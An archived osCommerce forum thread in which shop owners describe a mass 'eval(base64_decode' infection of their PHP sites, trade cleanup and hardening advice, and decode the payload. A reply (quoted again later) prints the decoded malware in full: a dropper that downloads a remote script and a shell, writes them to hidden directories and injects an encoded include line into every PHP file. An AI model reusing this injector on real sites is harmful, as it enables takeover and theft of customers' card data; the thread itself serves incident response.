FIMBLE Posted November 9, 2009 Author Share Posted November 9, 2009 Hi All, Looks like i too was a victim of this hack... now I have restored a backup from before the hack took place, but now i cannot access the admin panel... i put it in the browser and all it shows is a blank page on Firefox... anyone have any ideas? All the files are in there... i have even tried using the standard install files... nothing :( HI James, Its probably an error, look in your error logs from your server for clues, alternatively add this code to your admin/ login.php (if 2.2RC2A) or admin index.php (if 2.2MS) at the top of the file and within <?php tags ini_set('display_errors',1); error_reporting(E_ALL); I would imagine you have a headers already sent error Nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
Guest Posted November 18, 2009 Share Posted November 18, 2009 Joining the club - Hacked - and my team lost again today. Anyone know if they are smart enough to hide these files in directories other than OsCommerce such as WordPress or Joomla? Obviously the authors "like" OsCommerce. Yes!!! they can get into WordPress, at least v2.8.4... (wondering if that's why 2.8.5 and 2.8.6 came out so quickly afterwards??) Anyway, had my client's OSC site AND WP site hacked same day. Seems the bad file (in the Base64 decode) was located here: wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php So, now I'm spending my evening restoring things and hoping to make things more secure! UGH. Link to comment Share on other sites More sharing options...
Stroker396 Posted November 28, 2009 Share Posted November 28, 2009 I just found another main.inc.php The Site can be viewed at www.performanceautopartsonline.com The site is live (despite these minor glitches) please respect that and do not sign up etc... maybe a contribution one day when I get this site the way I want it. I don't make spelling mistakes! I have dyslecsic fingers. Link to comment Share on other sites More sharing options...
FIMBLE Posted December 4, 2009 Author Share Posted December 4, 2009 There are more popping up all the while. d3fault.php main_language.php english_main.php i just removed from someone's site. This time the hack was placed in only files relevant to the checkout process and copied all the clients details including the credit card numbers and mailed it to the .... nice! nic Sometimes you're the dog and sometimes the lamp post [/url] My Contributions Link to comment Share on other sites More sharing options...
phour19 Posted December 8, 2009 Share Posted December 8, 2009 man scary stuff. knock on wood neither one of my sites have been hit. I have made sure to take the steps listed here to secure my sites. :thumbsup: How to secure your site. A must read Link to comment Share on other sites More sharing options...
paromi1 Posted January 19, 2010 Share Posted January 19, 2010 Anyone can help me decode this nasty code ? It generated many pages in google on my domain http://www.megaupload.com/?d=9KUS9X2L Link to comment Share on other sites More sharing options...
MatthewRitchie Posted February 19, 2010 Share Posted February 19, 2010 Hello, I have had this hack before, and am a little wiser to the trouble it causes when you havent backed up recently, Guess what, I dont have a recent enough backup this time either, Bummer! But I have caught the detials of the the attacker in my last visitor logs, this should help developers/osc users and clarifies where the hackers got in: SORRY DIDNT WORK Link to comment Share on other sites More sharing options...
MyR Posted February 20, 2010 Share Posted February 20, 2010 http://addons.oscommerce.com/info/3220 ## POINTS AND REWARDS MODULE V1.00 ## This add-on seems to have the attack located in installer.php so beware. Good thing I read this forum before I became a victim! Thanks! I would like verification that it is an attack before I post on the contribution page; I am not skilled enough to decode it fully. Link to comment Share on other sites More sharing options...
Jan Zonjee Posted February 21, 2010 Share Posted February 21, 2010 http://addons.oscommerce.com/info/3220 ## POINTS AND REWARDS MODULE V1.00 ## This add-on seems to have the attack located in installer.php so beware. Good thing I read this forum before I became a victim! Thanks! I would like verification that it is an attack before I post on the contribution page; I am not skilled enough to decode it fully. It is not an attack but it contains highly obfuscated code that from the decoding attempts I did shows it wants to include code from a geocities website in Japan that is actually a nice install script (with bugs though). Since I got a warning URL file-access is disabled in the server configuration I don't think this installer.php will be very helpful to a lot of people. For the time being I disabled the upload of October 4, 2008 that contains this particular installer.php in the root directory and added a warning to the description of the contribution plus the upload of October 8, 2008 to use the installer.php in the directory sql_files. It gives a php header error on both the install and the uninstall for me but it does work. Link to comment Share on other sites More sharing options...
DSeyir Posted February 26, 2010 Share Posted February 26, 2010 Here's one more. And forex is all over the strange files. Starting to reinstall everything. I hope oscommerce have improved security issues. "The Breath becomes a stone; the stone, a plant; the plant, an animal; the animal, a man; the man, a spirit; and the spirit, a God." Link to comment Share on other sites More sharing options...
micheleangle Posted March 2, 2010 Share Posted March 2, 2010 My site was hacked, too. My hosting site ran a script to remove the long code. Just wondering a couple dumb questions here: 1. Does it matter if the initial coding on each file is <?php/**/?> instead of <?php/* - or exactly what should it be? 2. There's a "sedNXuf28" type document in admin/includes. I've never seen that before. Should I delete it? I have a feeling I will need to redo my entire site. Thanks! Link to comment Share on other sites More sharing options...
emilesteenkamp Posted March 2, 2010 Share Posted March 2, 2010 I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver. No outside links in signature allowed. See forum rules please. Link to comment Share on other sites More sharing options...
spooks Posted March 2, 2010 Share Posted March 2, 2010 I have been cleaning files over the weekend, found most of the encoding files, now just deleting the code on the decoding files, virtually every php file on the site, nearly 600 of them infected. I have until now deleted the code page by page, but it taking very long as you can imagine. Is there any way I can find and replace the same code on all the php files at once? I use dreamweaver. I`m not sure dreamweaver is the best choice for editing php files. If you follow the links in the OP including http://www.oscommerce.com/forums/index.php?showtopic=344272 you will find on that thread mention of a util to search all your files for the code. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
takiko Posted March 2, 2010 Share Posted March 2, 2010 I want to know how should I use the BASE63 encoder... after I have encode..what should I do... do I just paste it to my php file!? Link to comment Share on other sites More sharing options...
Whiskers Posted March 22, 2010 Share Posted March 22, 2010 eval(base64_decode hack going around the internet, If your cart “suddenly” stops working as it should with no input from yourselves it could be you have been subject to the latest automated hack. Some of the more common signs of this are * Category images stop displaying * FCK editor refuses to display images folder * Payment modules stop working * Checkout process stops working How will you know? Open any PHP file on your server, if at the very top you see a line like <?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKC (Goes on for a while) Then you have been hacked. To clean your site you have two options, 1, delete the entire set of PHP files on your server, (this hack will infect every single PHP file regardless of where it belongs, i.e non osC files will also be infected) And restore from a good back up. This is the best and easy route. 2, You need to find the source of the files that have been placed on your server, they are always hidden well away from the top level, to do this you need to copy the top line and paste it to a Base 64 decoder, I have my own file for this but you will be able to use any of many on the internet, here is one This will reveal the location of the files you have to remove, note that it could be from 1 file to upto 30, and in some cases they will overwrite the files that should be in the host folder. Once this is done, and the original files are restored, you have to go through every single PHP file and remove the code from the top line, I suggest you use a search / replace tool for this or its going to take you a very long time! When this has been done it will be good practice to “drop” your database, and upload a recent backup you took prior to infection, also check that there are no new users on the database, I’ve not come across this yet, but have heard it happens. Now your site is free on the code, you need to prevent it from happening again. How to prevent infection. This is not guaranteed 100% proof but it is going to help stop re-infection. Change the name of your admin folder to something less obvious. Delete admin/filemanager.php and associated links. Ensure that your folder permissions are never set higher than 755 Install some security addons, Also some ideas from this post can help you, If you do nothing, and do not rename your admin folder or delete the filemanager.php it is not a question of if, more when. There is a lot of fragmented help on the forums, I have pulled some of it together here, read up all you can there are a lot of great people posting good information here. I have just tried to use the Decoder that is recommended, but keep getting this error: Invalid character in a Base-64 string Do I need to change what I put into it? Link to comment Share on other sites More sharing options...
Whiskers Posted March 22, 2010 Share Posted March 22, 2010 There are times when the site will function without a problem, this is what the hacker wants as they are then able to maximise the amount of time they exist on your site without discovery. You really need to decode the line to find the place that the files are located in. There can be a lot of files or one or two, and called different names. style.css.php is one dg.php another there are .swf files also With the decoder just add the code minus the <?php (' at the start and the ')?> at the end Nic I have a bit of confusion with how to get the decoder to work. This is the start: <?php eval(gzinflate(base64_decode('FZnHDqvIFkU/p2+LATmpR2RMzhgmT+ScM1// ...and the end: /8++///73fw==')));?> When trying to take off the <?php and the ?> I keep gettig this error: Invalid length for a Base-64 char array. Link to comment Share on other sites More sharing options...
Guest Posted March 22, 2010 Share Posted March 22, 2010 Nick, Do not include this from the beginning: eval(gzinflate(base64_decode(' OR this at the end" '))); ?> so everything between the opening ' and ending ' ONLY Chris Link to comment Share on other sites More sharing options...
Whiskers Posted March 22, 2010 Share Posted March 22, 2010 Nick, Do not include this from the beginning: eval(gzinflate(base64_decode(' OR this at the end" '))); ?> so everything between the opening ' and ending ' ONLY Chris Thanks Chris. I now get this message though: Invalid character in a Base-64 string. Link to comment Share on other sites More sharing options...
Guest Posted March 22, 2010 Share Posted March 22, 2010 Nick, Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well. If you want to post the encoded code I will try to decode it for you. Chris Link to comment Share on other sites More sharing options...
MyR Posted March 22, 2010 Share Posted March 22, 2010 It would be a heck of a lot easier to restore a clean backup of your site than to try to clean all the files, and how would you know if you really did remove all the malicious code? I think the only way you could not have a backup is if 1. You're hosting the site yourself, and 2. You modify files directly on the live site. Obviously there's some problems with both of those if you don't know what you're doing. Link to comment Share on other sites More sharing options...
Whiskers Posted March 23, 2010 Share Posted March 23, 2010 Nick, Quite honestly, that decoder didn't work well on a couple of eval 64 scripts that I tested. There are others available as well. If you want to post the encoded code I will try to decode it for you. Chris Hi, it's strange because I have used it previously and got it to work, but it's wierd this time. I will PM it to you. Thanks. Link to comment Share on other sites More sharing options...
Guest Posted March 23, 2010 Share Posted March 23, 2010 Nick, This is the decoded file: function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; } Chris Link to comment Share on other sites More sharing options...
Whiskers Posted March 23, 2010 Share Posted March 23, 2010 Nick, This is the decoded file: function dg_main_exec(){ echo"<hr><div align='left'><br clear='all'>"; $pms = dgdownload($GLOBALS['dg_pu'], 60); if($pms){ echo"<b style='color:green'>{$GLOBALS['dg_pu']} [size: " . strlen($pms) . "]</b><br>[543676657]<br>"; leave_clear_php($pms); }else{ die("<b style='color:red'>{$GLOBALS['dg_pu']}</b><br>[93771902]<br>"); } $shl = dgdownload($GLOBALS['dg_eu'], 60); if($shl){ echo"<b style='color:green'>{$GLOBALS['dg_eu']} [size: " . strlen($shl) . "]</b><br>[599387883]<br>"; leave_clear_php($shl); }else{ die("<b style='color:red'>{$GLOBALS['dg_eu']}</b><br>[759303755]<br>"); } flush(); $ddrs = array(); $dgmssp = array(); $a = false; $GLOBALS['dgdirs'] = array(); echo"<h3>LOOKING FOR THE LONGEST PATH</h3><small>"; $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } if($path <> '/'){ if(isset($_GET['details'])){ echo"<h4>GOTO: $path</h4>";flush(); } fddir($path, $ddrs, $a); if(count($ddrs) > 0){ break; } } } if(!count($ddrs)){ if(isset($_GET['details'])){ echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); } fddir($GLOBALS['dgsp'], $ddrs, $a); } echo"</small>";flush(); $max = 0; $GLOBALS['dgcp'] = ''; $sep = ''; foreach($ddrs as $key=>$val){ if(!$sep){ if(!(strpos($key, '/') === false)){ $sep = '/'; }else{ $sep = '\\'; } } $fldr = explode($sep, $key); $c = count($fldr); if($max < $c){ $max = $c; $GLOBALS['dgcp'] = implode($sep, $fldr); } } if(!$GLOBALS['dgcp']){ die('<b style="color:red">nowhere to write anything</b><br>[4356398573]'); } if($GLOBALS['dgsp'] == $GLOBALS['dgcp']){ die("<b style='color:red'>can't save to the document root</b><br>[657834657]"); } echo"the longest available path: <b>{$GLOBALS['dgcp']}</b><br>"; $GLOBALS['dgcp'] = str_replace('\\', '/', $GLOBALS['dgcp']); /*setting up filenames*/ if(!replace_substring($pms, '$GLOBALS[\'dgcp\'] = "', '";', $GLOBALS['dgcp'])){ die("<b style='color:red'>failed to set path</b><br>[44883279]"); } echo"<b style='color:green'>path of main script successfully set [{$GLOBALS['dgcp']}]</b><br>[5482745]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgin\'] = "', '";', $GLOBALS['dgin'])){ die("<b style='color:red'>failed to set name</b><br>[58819152]"); } echo"<b style='color:green'>name of main script successfully set [{$GLOBALS['dgin']}]</b><br>[2246876]<br>"; if(!replace_substring($pms, '$GLOBALS[\'dgsp\'] = "', '";', $GLOBALS['dgsp'])){ die("<b style='color:red'>failed to set relative root dir</b><br>[58819152]"); } echo"<b style='color:green'>relative root dir successfully set [{$GLOBALS['dgsp']}]</b><br>[5893301]<br>"; /*fix start*/ $fn = 'admin/file_manager.php'; if(file_exists($fn)){ $fc = implode("", file($fn)); $src = "require('includes/application_top.php')"; $cue = 'if(strpos(strtolower($_SERVER[\'REQUEST_URI\']), \'file_manager.php/login.php?action=save\') > 0){die();}'; $fc = str_replace($src, "$cue\n $src", $fc); $f = fopen($fn, "w"); if($f){ fwrite($f, $fc); fflush($f); fclose($f); } } /*fix end*/ $packed_js = prepare_pack($pms); $my_size = strval(strlen($packed_js)); while(strlen($my_size) < 7){$my_size = '0' . $my_size;} if(!replace_substring($pms, '"00'.'0', '";', $my_size)){ die("<b style='color:red'>failed to set size</b><br>[86612935]"); } $packed_js = prepare_pack($pms); echo"<br>my packed size: $my_size<br>"; save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgin'], $packed_js, "<b style='color:green'>main script path [{$GLOBALS['dgcp']}{$GLOBALS['dgin']}]</b><br>[48839]<br>", 1, $silent); save_text_to_file($GLOBALS['dgcp'].$GLOBALS['dgsf'], $shl, "<b style='color:green'>shell path [{$GLOBALS['dgcp']}{$GLOBALS['dgsf']}]</b><br>[58392]<br>", 1); $str = "if(function_exists('ob_start')&&!isset(\$GLOBALS['mfsn'])){\$GLOBALS['mfsn']='{$GLOBALS['dgcp']}{$GLOBALS['dgin']}';if(file_exists(\$GLOBALS['mfsn'])){include_once(\$GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}"; $str = "<?php /**/eval(base64_decode('" . base64_encode($str) . "')); ?>"; echo"<small>"; echo"<h3>INJECTING PHP FILES</h3>"; $GLOBALS['dgdirs'] = array(); $GLOBALS['dgfiles'] = array(); echo"<h4>GOTO: {$GLOBALS['dgsp']}</h4>";flush(); phpinj($GLOBALS['dgsp'], $str, 1, 0); $tmp = explode("/", $GLOBALS['fpath']); $path = ''; $c = 0; foreach($tmp as $key=>$val){ if(!$val && $c){ continue; } $c++; $path .= $val . "/"; if(strlen($GLOBALS['dgsp']) > strlen($path)){ continue; } echo"<h4>GOTO: $path</h4>"; phpinj($path, $str, 1, 0); } /*remove expl. use only if executed as separete file*/ /*if(file_exists($GLOBALS['dgmn'])){unlink($GLOBALS['dgmn']);}*/ die("</small><hr><b>dgok</b></div>"); } if(isset($_GET['dginit'])){ dg_main_init(); }else{ echo"--- c99 ---"; } Chris Cheers Chris. How do I find out what file the hack is in? Link to comment Share on other sites More sharing options...
Guest Posted March 23, 2010 Share Posted March 23, 2010 Hi Nick, I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files: catalog/admin/file_manager.php catalog/admin/login.php catalog/includes/application_top.php I suggest you read these: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ http://www.oscommerce.com/forums/index.php?showtopic=340995 Chris Link to comment Share on other sites More sharing options...
Whiskers Posted March 23, 2010 Share Posted March 23, 2010 Hi Nick, I am going to guess you still have file_manager.php in your admin directory. This is the vulnerability but the code is using 3 files: catalog/admin/file_manager.php catalog/admin/login.php catalog/includes/application_top.php I suggest you read these: http://www.oscommerce.com/forums/topic/313323-how-to-secure-your-site/ http://www.oscommerce.com/forums/index.php?showtopic=340995 Chris Hey Chris, I have removed file manager, but I guess they must have slipped in before hand. I just started the site 3-4 days ago, so they have been quick! I noticed it because there was a thumbs.php file outside of my main files when I looked on FTP, so I removed it and checked other files, but it hasn't looked like it has spread into all my file like I have had happen before. I will check those other files though. Thanks. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.